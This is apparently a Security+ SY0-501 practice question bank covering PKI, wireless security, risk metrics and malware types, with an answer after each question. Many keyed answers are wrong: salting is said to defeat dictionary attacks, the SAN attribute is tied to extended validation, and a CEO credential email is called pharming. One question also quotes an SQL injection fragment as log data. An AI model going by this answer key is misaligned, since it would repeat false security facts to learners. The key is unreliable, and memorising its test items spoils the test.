SEC+ 501
A technician must configure a firewall to block external DNS traffic from entering a network. Which of the following ports should they block on the firewall? A. 53 B. 110 C. 143 D. 443
A. 53
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Competitor B. Hacktivist C. Insider D. Organized crime
A. Competitor
Which of the following attacks specifically impacts data availability? A. DDoS B. Trojan C. MITM D. Rootkit
A. DDoS
In a corporation where compute utilization spikes several times a year, the Chief Information Officer (CIO) has requested a cost-effective architecture to handle the variable capacity demand. Which of the following characteristics BEST describes what the CIO has requested? A. Elasticity B. Scalability C. High availability D. Redundancy
A. Elasticity
Which of the following technologies employ the use of SAML? (Select TWO). A. Single sign-on B. Federation C. LDAP D. Secure token E. RADIUS
A. Single sign-on B. Federation
Two users need to send each other emails over unsecured channels. The system should support the principle of non-repudiation. Which of the following should be used to sign the users' certificates? A. RA B. CA C. CRL D. CSR
B. CA
Which of the following cryptographic attacks would salting of passwords render ineffective? A. Brute force B. Dictionary C. Rainbow tables D. Birthday
B. Dictionary
A security administrator is trying to encrypt communication. For which of the following reasons should administrator take advantage of the Subject Alternative Name (SAM) attribute of a certificate? A. It can protect multiple domains B. It provides extended site validation C. It does not require a trusted certificate authority D. It protects unlimited subdomains
B. It provides extended site validation
An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? A. Staging B. Test C. Development D. Production
B. Test
Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet? A. Design weakness B. Zero-day C. Logic bomb D. Trojan
B. Zero-day
Which of the following should be used to implement voice encryption? A. SSLv3 B. VDSL C. SRTP D. VoIP
C. SRTP
An organization's Chief Information Officer recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy? A. HTTPS B. SMTP C. TLS D. SFTP
C. TLS
Which of the following attack types BEST describes a client-side attack that is used to mandate an HTML iframe with JavaScript code via web browser? A. Buffer overflow B. MITM C. xss D. SQLi
C. xss
Which of the following security controls does an iris scanner provide? A. Logical B. Administrative C. Corrective D. Physical E. Detective F. Deterrent
D. Physical
The chief security officer (CS0) has issued a new policy that requires that all internal websites be configured for HTTPS traffic only. The network administrator has been tasked to update all internal sites without incurring additional costs. Which of the following is the best solution for the network administrator to secure each internal website? A. Use certificates signed by the company CA B. Use a signing certificate as a wild card certificate C. Use certificates signed by a public ca D. Use a self-signed certificate on each internal server
D. Use a self-signed certificate on each internal server
A security analyst is implementing PKI-based functionality to a web application that has the following requirements: File contains certificate information, Certificate chains, Root authority certificates and Private key. All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these requirements? A. .pfx certificate B. .cer certificate C. .der certificate D. .crt certificate
A. .pfx certificate
A security analyst is hardening a large-scale wireless network. The primary requirements are the following: Must use authentication through EAP-TLS certificates, Must use an AAA server and Must user the most secure encryption protocol. Given these requirements, which of the following should the analyst implement and recommend? (Select TWO) A. 802.1x B. 802.3 C. LDAP D. TKIP E. CCMP F. WPA2-PSK
A. 802.1x E. CCMP
Malicious traffic from an internal network has been detected on an unauthorized port on an application server. Which of the following network-based security controls should the engineer consider implementing? A. ACLs B. HIPS C. NAT D. MAC filtering
A. ACLs
Which of the following encryption algorithms is used primarily to secure data at rest? A. AES B. SSL C. TLS D. RSA
A. AES
A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? A. ARO B. MTBF C. ALE D. MTTR E. SLA
A. ARO
To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO) A. ARO B. ROI C. RPO D. SLE E. RTO
A. ARO D. SLE
Which of the following enables sniffing attacks against a switched network? A. ARP poisoning B. IGMP snooping C. IP spoofing D. SYN flooding
A. ARP poisoning
Which of the following differentiates ARP poisoning from a MAC spoofing attack? A. ARP poisoning uses unsolicited ARP replies B. ARP poisoning overflows a switch's CAM table C. MAC spoofing uses DHCPOFFER/DHCPACK packets D. MAC spoofing can be performed across multiple routers
A. ARP poisoning uses unsolicited ARP replies
Adhering to a layered security approach, a controlled access facility employs security guards who verify the authorization of all personnel entering the facility. Which of the following terms BEST describes the security control being employed? A. Administrative B. Corrective C. Deterrent D. Compensating
A. Administrative
A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: "SELECT*FROM" and '1'='1' Which of the following can the security administrator determine from this? A. An SQL injection attack is being attempted B. Legitimate connections are being dropped C. A network scan is being done on the system D. An XSS attack is being attempted
A. An SQL injection attack is being attempted
Which of the following is being described when a security professional develops and publishes a password policy specifically tailored to a company, and enforces the policy through technical means? A. Applying vendor-specific configurations B. Developing regulatory frameworks C. Implementing security control diversity D. Creating security benchmarks
A. Applying vendor-specific configurations
Recently several employees were victims of a phishing email that appeared to originate from the company president. The email claimed the employees would be disciplined if they did not click on a malicious link in the message. Which of the following principles of social engineering made this attack successful? A. Authority B. Spamming C. Social proof D. Scarcity
A. Authority
Which of the following are used to increase the computation time required to crack a password? (Select Two) A. BCRYPT B. Substitution cipher C. ECDHE D. PBKDF2 E. Diffie-Hellman
A. BCRYPT D. PBKDF2
An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? A. Back up and archive the production data to an external source B. Disable notifications in the production system C. Scrub the confidential information D. Encrypt the data prior to the stress test
A. Back up and archive the production data to an external source
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning
A. Banner grabbing
A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies this type of penetration testing? A. Black box B. White box C. Gray box D. Blue teaming
A. Black box
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus
A. Botnet
Which of the following is the proper way to quantify the total monetary damage resulting from an exploited vulnerability? A. Calculate the ALE B. Calculate the ARO C. Calculate the MTBF D. Calculate the TCO
A. Calculate the ALE
An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the CEO. Which of the following is the best next step for the analyst to take? A. Call the CEO directly to ensure awareness of the event B. Run a malware scan on the CEO's workstation C. Reimage the CEO's workstation D. Disconnect the CEO's workstation from the network
A. Call the CEO directly to ensure awareness of the event
An incident responder receives a call from a user who reports a computer is exhibiting symptoms consistent with a malware infection. Which of the following steps should the responder perform NEXT? A. Capture and document necessary information to assist in the response. B. Request the user capture and provide a screenshot or recording of the symptoms C. Use a remote desktop client to collect and analyze the malware m real time D. Ask the user to back up files for later recovery
A. Capture and document necessary information to assist in the response.
An attacker compromises a public CA and issues unauthorized X.509 certificates for Company.com. In the future, impact of similar incidents. Which of the following would assist Company.com with its goal? A. Certificate pinning B. Certificate stapling C. Certificate chaining D. Certificate with extended validation
A. Certificate pinning
Which of the following must be intact for evidence to be admissible in court? A. Chain of custody B. Order of violation C. Legal hold D. Preservation
A. Chain of custody
A company researched the root cause of a recent vulnerability in its software. It was determined that the vulnerability was the result of two updates made in the last release. Each update alone would not have resulted in the vulnerability. In order to prevent similar situations in the future, the company should improve which of the following? A. Change management procedures B. Job rotation policies C. Incident response management D. Least privilege access controls
A. Change management procedures
A network technician must update the company's wireless configuration settings to comply with new requirements, which mandate the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? A. Configure CCMP B. Require TKIP C. Implement WPA D. Implement 802.1x
A. Configure CCMP
An organization relies heavily on an application that has a high frequency of security updates. At present, the security team only updates the application on the first Monday of each month, even though the security updates are released as often as twice a week. Which of the following would be the BEST method of updating this application? A. Configure testing and automate patch management for the application. B. Configure security control testing for the application. C. Manually apply updates for the application when they are released. D. Configure a sandbox for testing patches before the scheduled monthly update.
A. Configure testing and automate patch management for the application.
While investigating a virus infection, a security analyst discovered the following on an employee laptop; Multiple folders containing a large number of newly released movies and music files, proprietary company data, a large amount of PHI data, unapproved FTP software and Documents that appear to belong to a competitor. Which of the following should the analyst do FIRST? A. Contact the legal and compliance department for guidance B. Delete the files, remove the FTP software, and notify management C. Back up the files and return the device to the user D. Wipe and reimage the device
A. Contact the legal and compliance department for guidance
A vulnerability scanner that uses its running service's access level to better assess vulnerabilities across multiple assets within an organization is performing a: A. Credentialed scan. B. Non-intrusive scan. C. Privilege escalation test. D. Passive scan.
A. Credentialed scan.
Which of the following is a penetration tester performing when running an SMB NULL session scan of a host to determine valid usernames and share names? A. Credentialed vulnerability scan B. Passive scan C. Non-credentialed scan D. Non-intrusive vulnerability testing E. Penetration testing
A. Credentialed vulnerability scan
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select THREE) A. Crypto-malware B. Adware C. Botnet attack D. Virus E. Ransomware F. Backdoor G. DDoS attack
A. Crypto-malware C. Botnet attack E. Ransomware
A company wants to host a publicly available server that performs the following functions: Evaluates MX record lookup Can perform authenticated requests for A and AAA records Uses RRSIG Which of the following should the company use to fulfill the above requirements? A. DNSSEC B. SFTP C. nslookup D. dig
A. DNSSEC DNS Security Extensions (DNSSEC) provides, among other things, cryptographic authenticity of responses using Resource Record Signatures (RRSIG) and authenticated denial of existence using Next-Secure (NSEC) and Hashed-NSEC records (NSEC3).
A technician is configuring a wireless guest network. After applying the most recent changes the technician finds the new devices can no longer find the wireless network by name but existing devices are still able to use the wireless network. Which of the following security measures did the technician MOST likely implement to cause this Scenario? A. Deactivation of SSID broadcast B. Reduction of WAP signal output power C. Activation of 802.1X with RADIUS D. Implementation of MAC filtering E. Beacon interval was decreased
A. Deactivation of SSID broadcast
Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Technical D. Deterrent
A. Detective
A high-security defense installation recently began utilizing large guard dogs that bark very loudly and excitedly at the slightest provocation. Which of the following types of controls does this BEST describe? A. Deterrent B. Preventive C. Detective D. Compensating
A. Deterrent
A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: * All access must be correlated to a user account. * All user accounts must be assigned to a single individual. * User access to the PHI data must be recorded. * Anomalies in PHI data access must be reported. * Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews.
A. Eliminate shared accounts. C. Implement usage auditing and review. G. Perform regular permission audits and reviews.
A network administrator wants to ensure that users do not connect any unauthorized devices to the company network. Each desk needs to connect a VoIP phone and computer. Which of the following is the BEST way to accomplish this? A. Enforce authentication for network devices B. Configure the phones on one VLAN, and computers on another C. Enable and configure port channels D. Make users sign an Acceptable use Agreement
A. Enforce authentication for network devices
New magnetic locks were ordered for an entire building. In accordance with company policy, employee safety is the top priority. In case of a fire where electricity is cut, which of the following should be taken into consideration when installing the new locks? A. Fail safe B. Fault tolerance C. Fail secure D. Redundancy
A. Fail safe
Which of the following occurs when a vulnerability scan fails to identify an existing vulnerability? A. False negative B. False positive C. True positive D. True negative
A. False negative
An administrator is testing the collision resistance of different hashing algorithms. Which of the following is the strongest collision resistance test? A. Find two identical messages with different hashes B. Find two identical messages with the same hash C. Find a common hash between two specific messages D. Find a common hash between a specific message and a random message
A. Find two identical messages with different hashes
A technician has installed new vulnerability scanner software on a server that is joined to the company domain. The vulnerability scanner is able to provide visibility over the patch posture of all company's clients. Which of the following is being used? A. Gray box vulnerability testing B. Passive scan C. Credentialed scan D. Bypassing security controls
A. Gray box vulnerability testing
An administrator intends to configure an IPSec solution that provides ESP with integrity protection, but not confidentiality protection. Which of the following AES modes of operation would meet this integrity-only requirement? A. HMAC B. PCBC C. CBC D. GCM E. CFB
A. HMAC
An auditor is reviewing the following output from a password cracking tool: User:1: Password1 User2: Recovery! User3: Alaskan10 User4: 4Private User5: PerForMance2 Which of the following methods did the author MOST likely use? A. Hybrid B. Dictionary C. Brute force D. Rainbow table
A. Hybrid
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur? A. Impersonation B. Credential harvesting C. Password cracking D. Lateral movement
A. Impersonation
A security analyst is hardening a web server, which should allow a secure certificate-based session using the organization's PKI infrastructure. The web server should also utilize the latest security techniques and standards. Given this set of requirements, which of the following techniques should the analyst implement to BEST meet these requirements? (Select two.) A. Install an X- 509-compliant certificate. B. Implement a CRL using an authorized CA. C. Enable and configure TLS on the server. D. Install a certificate signed by a public CA. E. Configure the web server to use a host header.
A. Install an X- 509-compliant certificate C. Enable and configure TLS on the server..
An analyst is part of a team that is investigating a potential breach of sensitive data at a large financial services organization. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. The team also discovers undocumented firewall rules, which allowed the unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to take the proprietary data? A. Keylogger B. Botnet C. Crypto-malware D. Backdoor E. Ransomware F. DLP
A. Keylogger
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which services the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data? (Choose two) A. Keylogger B. Botnet C. Crypto-malware D. Backdoor E. Ransomware F. DLP
A. Keylogger C. Crypto-malware
When identifying a company's most valuable assets as part of a BIA, which of the following should be the FIRST priority? A. Life B. Intellectual property C. Sensitive data D. Public reputation
A. Life
Which of the following works by implanting software on systems but delays execution until a specific set of conditions is met? A. Logic bomb B. Trojan C. Scareware D. Ransomware
A. Logic bomb
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to protect the chain of custody? A. Make a forensic copy B. Create a hash of the hard drive C. Recover the hard drive data D. Update the evidence log
A. Make a forensic copy
A technician is investigating a potentially compromised device with the following symptoms: Browser slowness , frequent browser crashes, hourglass stuck, new search toolbar and increased memory consumption. Which of the following types of malware has infected the system? A. Man-in-the-browser B. Spoofer C. Spyware D. Adware
A. Man-in-the-browser
In a lessons learned report, it is suspected that a well-organized, well-funded, and extremely sophisticated group of attackers may have been responsible for a breach at a nuclear facility. Which of the following describes the type of actors that may have been implicated? A. Nation state B. Hacktivist C. Insider D. Competitor
A. Nation state
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use? A. Non-intrusive B. Intrusive C. Credentialed D. Passive
A. Non-intrusive
A company is currently using the following configuration: * IAS server with certificate-based EAP-PEAP and MSCHAP * Unencrypted authentication via PAP A security administrator needs to configure a new wireless setup with the following configurations: * PAP authentication method * PEAP and EAP provide two-factor authentication Which of the following forms of authentication are being used? (Select TWO). A. PAP B. PEAP C. MSCHAP D. PEAP-MSCHAP E. EAP F. EAP-PEAP
A. PAP F. EAP-PEAP
An analyst wants to implement a more secure wireless authentication for office access points. Which of the following technologies allows for encrypted authentication of wireless clients over TLS? A. PEAP B. EAP C. WPA2 D. RADIUS
A. PEAP
Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement? A. PGP B. HTTPS C. WPA D. TLS
A. PGP
A highly complex password policy has made it nearly impossible to crack account passwords. Which of the following might a hacker still be able to perform? A. Pass-the-hash attack B. ARP poisoning attack C. Birthday attack D. Brute force attack
A. Pass-the-hash attack
A company exchanges information with a business partner. An annual audit of the business partner is conducted against the SLA in order to verify: A. Performance and service delivery metrics B. Backups are being performed and tested C. Data ownership is being maintained and audited D. Risk awareness is being adhered to and enforced
A. Performance and service delivery metrics
A Chief Executive Officer of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has most likely occurred? A. Pharming B. Hoax C. Whaling D. Spear phishing
A. Pharming
After a security assessment was performed on the enterprise network, it was discovered that: 1. Configuration changes have been made by users without the consent of IT 2. Network congestion has increased due to the use of social media 3. Users are accessing file folders and network shares that are beyond the scope of their need to know. Which of the following BEST describes the vulnerabilities that exist in this environment? (Select TWO) A. Poorly trained users B. Misconfigured WAP settings C. Undocumented assets D. Improperly configured accounts E. Vulnerable business processes
A. Poorly trained users D. Improperly configured accounts
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Privilege escalation B. Pivoting C. Process affinity D. Buffer overflow
A. Privilege escalation
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? ( Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES
A. Public key E. Private key
A system administrator needs to implement 802.1x whereby when a user logs into the network, the authentication server communicates to the network switch and assigns the user to the proper VLAN. Which of the following protocols should be used? A. RADIUS B. Kerberos C. LDAP D. MSCHAP
A. RADIUS
University A offers an AAA-based SSO service that allows students to access all wireless and VPN services with the standard university credentials. University A wants to partner with University B to allow its students who are taking classes at University B to sign into both university's wireless network and VPN services with their home university credentials. Which of the following should be implemented to achieve the desired results? A. RADIUS federation B. SAML C. Wildcard certificates D. OAuth 2.0 E. Reverse proxy
A. RADIUS federation
A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor discovers that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select TWO) A. RAT B. Ransomware C. Worm D. Trojan E. Backdoor
A. RAT E. Backdoor
An organization has determined it can tolerate a maximum of three hours of downtime. Which of the following has been specified? A. RTO B. RPO C. MTBF D. MTTR
A. RTO
Which of the following is a compensating control that will BEST reduce the risk of weak passwords? A. Requiring the use of one-time tokens B. Increasing password history retention count C. Disabling user accounts after exceeding maximum attempts D. Setting expiration of user passwords to a shorter time
A. Requiring the use of one-time tokens
Which of the following is a compensating control that will BEST reduce the risk of weak passwords? A. Requiring the user of one-time tokens B. Increasing password history retention count C. Disabling user accounts after exceeding maximum attempts D. Setting expiration of user passwords to a shorter time
A. Requiring the user of one-time tokens
Which of the following is an important step to take BEFORE moving any installation packages from a test environment to production? A. Roll back changes in the test environment B. Verify the hashes of files C. Archive and compress the files D. Update the secure baseline
A. Roll back changes in the test environment
Students at a residence hall are reporting internet connectivity issues. The university's network administrator configured the residence hall's network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall's network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation? A. Router ACLs B. BPDU guard C. Flood guard D. DHCP snooping
A. Router ACLs
During a recent audit, several undocumented and unpatched devices were discovered on the internal network. Which of the following can be done to prevent similar occurrences? A. Run weekly vulnerability scans and remediate any missing patches on all company devices B. Implement rogue system detection and configure automated alerts for new devices C. Install DLP controls and prevent the use of USB drives on devices D. Configure the WAP's to use NAC and refuse connections that do not pass the healty check
A. Run weekly vulnerability scans and remediate any missing patches on all company devices
A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently deployed PKI services to support this strategy. Which of the following protocols supports the strategy and employs certificates generated by the PKI? (select THREE) A. S/MIME B. TLS C. SFTP D. SAML E. SIP F. IPSec G. Kerberos
A. S/MIME B. TLS F. IPSec
A penetration testing is preparing for a client engagement in which the tester must provide data that proves and validates the scanning tools' results. Which of the following is the best method for collecting this information? A. Set up the scanning system's firewall to permit and log all outbound connections B. Use a protocol analyzer to log all pertinent network traffic C. Configure network flow data logging on all scanning system D. Enable debug level logging on the scanning system and all scanning tools used.
A. Set up the scanning system's firewall to permit and log all outbound connections
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? A. Shredding B. Wiping C. Low-level formatting D. Repartitioning E. Overwriting
A. Shredding
A security administrator needs to implement a system that detects possible intrusions based upon a vendor provided list. Which of the following BEST describes this type of IDS? A. Signature based B. Heuristic C. Anomaly-based D. Behavior-based
A. Signature based
An employer requires that employees use a key-generating app on their smartphones to log into corporate applications. In terms of authentication of an individual, this type of access policy is BEST defined as: A. Something you have. B. Something you know. C. Something you do. D. Something you are.
A. Something you have.
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation
A. Symmetric algorithm
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) A. TACACS+ B. CHAP C. LDAP D. RADIUS E. MSCHAPv2
A. TACACS+ D. RADIUS
A security team wants to establish an Incident Response plan. The team has never experienced an incident. Which of the following would BEST help them establish plans and procedures? A. Table top exercises B. Lessons learned C. Escalation procedures D. Recovery procedures
A. Table top exercises
Which of the following is the GREATEST risk to a company by allowing employees to physically bring their personal smartphones to work? A. Taking pictures of proprietary information and equipment in restricted areas. B. Installing soft token software to connect to the company's wireless network. C. Company cannot automate patch management on personally-owned devices. D. Increases the attack surface by having more target devices on the company's campus
A. Taking pictures of proprietary information and equipment in restricted areas.
A security administrator is investigating many recent incidents of credential theft for users accessing the company's website, despite the hosting web server requiring HTTPS for access. The server's logs show the website leverages the HTTP POST method for carrying user authentication details. Which of the following is the MOST likely reason for compromise? A. The HTTP POST method is not protected by HTTPS B. The web server is running a vulnerable SSL configuration C. The company does not support DNSSEC D. The HTTP response is susceptible to sniffing
A. The HTTP POST method is not protected by HTTPS
A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? A. The certificate has expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum
A. The certificate has expired
A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? A. The certificate has expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum
A. The certificate has expired
Which of the following occurs when the security of a web application relies on JavaScript for input validation? A. The integrity of the data is at risk. B. The security of the application relies on antivirus. C. A host-based firewall is required. D. The application is vulnerable to race conditions.
A. The integrity of the data is at risk.
A company has three divisions, each with its own networks and services. The company decides to make its secure web portal accessible to all employees utilizing their existing usernames and passwords, The security administrator has elected to use SAML to support authentication. In this scenario, which of the following will occur when users try to authenticate to the portal? (Select TWO) A. The portal will function as an identity provider and issue an authentication assertion B. The portal will request an authentication ticket from each network that is transitively trusted C. The back-end networks will function as an identity provider and issue an authentication assertion D. The back-end networks will request authentication tickets from the portal, which will act as the third-party service provider authentication store E. The back-end networks will verify the assertion token issued by the portal functioning as the identity provider
A. The portal will function as an identity provider and issue an authentication assertion B. The portal will request an authentication ticket from each network that is transitively trusted
Which of the following explains why vendors publish MD5 values when they provide software patches for their customers to download over the Internet? A. The recipient can verify integrity of the software patch. B. The recipient can verify the authenticity of the site used to download the patch. C. The recipient can request future updates to the software using the published MD5 value. D. The recipient can successfully activate the new software patch.
A. The recipient can verify integrity of the software patch.
A user clicked an email link that led to a website that infected the workstation with a virus. The virus encrypted all the network shares to which the user had access. The virus was not detected or blocked by the company's email filter, website filter, or antivirus. Which of the following describes what occurred? A. The user's account was over-privileged. B. Improper error handling triggered a false negative in all three controls C. The email originated from a private email server with no malware protection D. The virus was a zero-day attack
A. The user's account was over-privileged.
A user of the wireless network is unable to gain access to the network. The symptoms are: 1.) Unable to connect to both internal and Internet resources 2.) The wireless icon shows connectivity but has no network access The wireless network is WPA2 Enterprise and users must be a member of the wireless security group to authenticate. Which of the following is the MOST likely cause of the connectivity issues? A. The wireless signal is not strong enough B. A remote DDoS attack against the RADIUS server is taking place C. The user's laptop only supports WPA and WEP D. The DHCP scope is full E. The dynamic encryption key did not update while the user was offline
A. The wireless signal is not strong enough
A company determines that it is prohibitively expensive to become compliant with new credit card regulations. Instead, the company decides to purchase insurance to cover the cost of any potential loss. Which of the following is the company doing? A. Transferring the risk B. Accepting the risk C. Avoiding the risk D. Mitigating the risk
A. Transferring the risk
As part of a new industry regulation, companies are required to utilize secure, standardized OS settings. A technician must ensure the OS settings are hardened. Which of the following is the BEST way to do this? A. Use a vulnerability scanner. B. Use a configuration compliance scanner. C. Use a passive, in-line scanner. D. Use a protocol analyzer.
A. Use a vulnerability scanner.
Which of the following can be provided to an AAA system for the identification phase? A. Username B. Permissions C. One-time token D. Private certificate
A. Username
In terms of encrypting data, which of the following is BEST described as a way to safeguard password data by adding random data to it in storage? A. Using salt B. Using hash algorithms C. Implementing elliptical curve D. Implementing PKI
A. Using salt
Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO). A. Verify the certificate has not expired on the server. B. Ensure the certificate has a .pfx extension on the server. C. Update the root certificate into the client computer certificate store. D. Install the updated private key on the web server. E. Have users clear their browsing history and relaunch the session.
A. Verify the certificate has not expired on the server. C. Update the root certificate into the client computer certificate store.
Anne, the Chief Executive Officer (CEO), has reported that she is getting multiple telephone calls from someone claiming to be from the helpdesk. The caller is asking to verify her network authentication credentials because her computer is broadcasting across the network. This is MOST likely which of the following types of attacks? A. Vishing B. Impersonation C. Spim D. Scareware
A. Vishing
A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees? A. WPS B. 802.1x C. WPA2-PSK D. TKIP
A. WPS
Which of the following is a major difference between XSS attacks and remote code exploits? A. XSS attacks use machine language, while remote exploits use interpreted language B. XSS attacks target servers, while remote code exploits target clients C. Remote code exploits aim to escalate attackers' privileges, while XSS attacks aim to gain access only D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work
A. XSS attacks use machine language, while remote exploits use interpreted language
An attacker discovers a new vulnerability in an enterprise application. The attacker takes advantage of the vulnerability by developing new malware. After installing the malware the attacker is provided with access to the infected machine. Which of the following is being described? A. Zero-day exploit B. Remote code execution C. Session hijacking D. Command injection
A. Zero-day exploit
A security administrator is creating a subnet on one of the corporate firewall interfaces to use as a DMZ which is expected to accommodate at most 14 physical hosts. Which of the following subnets would BEST meet the requirements? A. 192.168.0.16 255.25.255.248 B. 192.168.0.16/28 C. 192.168.1.50 255.255.25.240 D. 192.168.2.32/27
B. 192.168.0.16/28
A database backup schedule consists of weekly full backups performed on Saturday at 12:00 A.m. and daily differential backups also performed at 12:00 A.m. If the database is restored on Tuesday afternoon, which of the following is the number of individual backups that would need to be applied to complete the database recovery? A. 1 B. 2 C. 3 D. 4
B. 2
After a significant amount of hiring, an organization would like to simplify the connection process to its wireless network for employees while ensuring maximum security. The Chief Information Office want to get rid of any shared network passwords and require employees to use their company credentials when connecting. Which of the following should be implemented to BEST meet this requirement? A. PSK B. 802.1x C. CCMP D. TKIP
B. 802.1x
When connected to a secure WAP, which of the following encryption technologies is MOST likely to be configured when connecting to WPA2-PSK? A. DES B. AES C. MD5 D. WEP
B. AES
Which of the following is used to encrypt web application data? A. MD5 B. AES C. SHA D. DHA
B. AES
Which of the following is the summary of loss for a given year? A. MTBF B. ALE C. SLA D. ARO
B. ALE
When considering a third-party cloud service provider, which of the following criteria would be the BEST to include in the security assessment process? (Select two.) A. Use of performance analytics B. Adherence to regulatory compliance C. Data retention policies D. Size of the corporation E. Breadth of applications support
B. Adherence to regulatory compliance C. Data retention policies
Which of the following implements two-factor authentication? A. A phone system requiring a PIN to make a call B. An ATM requiring a credit card and PIN C. A computer requiring username and password D. A datacenter mantrap requiring fingerprint and iris scan
B. An ATM requiring a credit card and PIN
A company is developing a new secure technology and requires computers being used for development to be isolated. Which of the following should be implemented to provide the MOST secure environment? A. A perimeter firewall and IDS B. An air gapped compiler network C. A honeypot residing in a DMZ D. An ad hoc network with NAT E. A bastion host
B. An air gapped compiler network
Which of the following attack types is being carried out where a target is being sent unsolicited messages via Bluetooth? A. War chalking B. Bluejacking C. Bluesnarfing D. Rogue tethering
B. Bluejacking
An organization needs to implement a large PKI. Network engineers are concerned that repeated transmission of the OCSP will impact network performance. Which of the following should the security analyst recommend is lieu of an OCSP? A. CSR B. CRL C. CA D. OID
B. CRL
While trouble shooting a client application connecting to the network, the security administrator notices the following error.Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? A. PKI B. CRL C. CSR D. IPSec
B. CRL
An administrator has concerns regarding the traveling sales team who works primarily from smart phones. Given the sensitive nature of their work, which of the following would BEST prevent access to the data in case of loss or theft? A. Enable screensaver locks when the phones are not in use to prevent unauthorized access B. Configure the smart phones so that the stored data can be destroyed from a centralized location C. Configure the smart phones so that all data is saved to removable media and kept separate from the device D. Enable GPS tracking on all smart phones so that they can be quickly located and recovered
B. Configure the smart phones so that the stored data can be destroyed from a centralized location
A security administrator returning from a short vacation receives an account lock-out message when attempting to log into the computer. After getting the account unlocked the security administrator immediately notices a large amount of emails alerts pertaining to several different user accounts being locked out during the past three days. The security administrator uses system logs to determine that the lock-outs were due to a brute force attack on all accounts that has been previously logged into that machine. Which of the following can be implemented to reduce the likelihood of this attack going undetected? A. Password complexity rules B. Continuous monitoring C. User access reviews D. Account lockout policies
B. Continuous monitoring
